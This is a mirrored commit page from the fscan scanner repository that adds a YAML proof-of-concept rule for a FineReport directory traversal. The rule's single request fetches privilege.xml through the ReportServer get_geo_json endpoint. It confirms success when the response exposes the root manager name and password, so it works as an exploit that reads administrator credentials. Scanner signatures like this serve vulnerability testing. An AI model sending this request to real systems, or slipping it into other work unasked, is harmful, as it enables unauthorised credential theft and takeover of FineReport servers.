mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-27 05:31:53 +08:00
feat: add curated internal network pocs
This commit is contained in:
@@ -0,0 +1,16 @@
|
||||
id: finereport-directory-traversal
|
||||
|
||||
info:
|
||||
name: Finereport Directory Traversal
|
||||
author: l1nk3r
|
||||
severity: high
|
||||
tags: finereport,directory-traversal
|
||||
created: 2023/11/14
|
||||
|
||||
rules:
|
||||
r0:
|
||||
request:
|
||||
method: GET
|
||||
path: /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
|
||||
expression: response.status == 200 && response.body.bcontains(b"<rootManagerName>") && response.body.bcontains(b"<rootManagerPassword>")
|
||||
expression: r0()
|
||||
Reference in New Issue
Block a user